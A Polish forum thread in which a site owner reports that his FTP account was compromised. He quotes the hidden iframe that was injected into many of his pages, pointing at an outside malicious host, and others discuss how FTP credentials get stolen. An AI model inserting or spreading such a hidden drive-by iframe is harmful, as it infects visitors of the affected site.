Łapcie exploita

[pezet40]

W skrocie: Ktos sie wlamal na moje konto FTP (podejrzewam ze przez jakas dziure w systemie joomla) i w wielu plikach pozostawił taki wpis

Kod:

"<iframe src="http://mymixwager.cn:8080/index.php" width=100 height=152 style="visibility: hidden"></iframe>

Automatycznie wchodzac na moja strone instaluje sie na komputerze jakies gowno... wiem bo avast go blokuje... a co by bylo gdyby avasta nie bylo? Nie wiem, nawet nie wiem co tam jest bo nie wchodze jak chcecie sie bawcie...

Daje wam bo dziwi mnie ze dziala na SP3 i Firefoxie 3.0

[hxv]

Avast (podobnie jak większość AV) blokuje próbę ataku, jeśli wejdziesz na stronę z exploitem sprzed 5 lat na IE używając FF to też będzie wył.
Skąd to się wzięło na Twojej WWW, bug w Joomli? Wątpię, raczej masz na PC jakiegoś wirusa który odczytuje hasła do FTP z popularnych programów i sam wgrywa taki kod na stronę (czytałem też, że te lepsze sniffują i wyłapują hasła podczas łączenia się do serwera, niestety mam pecha i na żaden syf od dawna nie trafiam ).

[thc_flow]

http://haxite.org/index.php3?site=newsy&am...iew&id=5061 - O to chodzi? :>

[pezet40]

O to chodzi. Ukazal tez sie o tym artykul na onecie... Juz czaje wszystko przez to ze zaakceptowalem jakies uaktualnienie flash playera i faktycznie tak bylo bo sobie przypominam...

W sumie mam to gdzieś. W banku moim online jest jeszcze cos jak "kody jednorazowe" a na ftp cennych rzeczy nie mam... a kopie serwisu mialem takze juz pliki podmienione...